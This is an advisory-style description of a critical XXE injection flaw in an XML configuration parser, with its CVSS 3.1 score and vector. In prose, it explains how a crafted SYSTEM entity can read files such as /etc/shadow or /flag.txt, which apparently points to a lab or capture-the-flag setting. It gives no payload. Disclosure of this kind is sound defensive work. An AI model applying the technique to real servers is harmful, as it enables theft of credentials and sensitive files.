Critical XXE Injection in XML Configuration Parser Exposes Sensitive System Files

A critical XML External Entity (XXE) injection vulnerability has been identified in an XML Configuration Validation module, posing a severe risk of unauthorized data exfiltration. The flaw, with a CVSS score of 9.1, stems from an insecurely configured XML parser that processes user-supplied configuration files. This insecure configuration allows the parser to resolve external entities defined within Document Type Definitions (DTDs), enabling attackers to craft malicious XML payloads that target and read sensitive local files on the server.

The vulnerability resides specifically within the Configuration XML parser component. An attacker can exploit this by uploading or submitting a specially crafted XML configuration file containing a SYSTEM entity. This entity can be directed at critical system files such as `/flag.txt`, `/etc/shadow`, or application source code. During the standard validation phase, the vulnerable parser resolves the entity's URI and replaces the entity reference with the content of the targeted file, effectively exfiltrating its data.

The severity of this flaw is underscored by its CVSS vector (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N), indicating it is network-exploitable, requires low attack complexity, and has no privileges or user interaction required. Successful exploitation leads to high impacts on both confidentiality and integrity, allowing attackers to read sensitive data and potentially manipulate system state. This vulnerability represents a fundamental failure in secure parsing logic, placing any system using this module at immediate risk of data breach.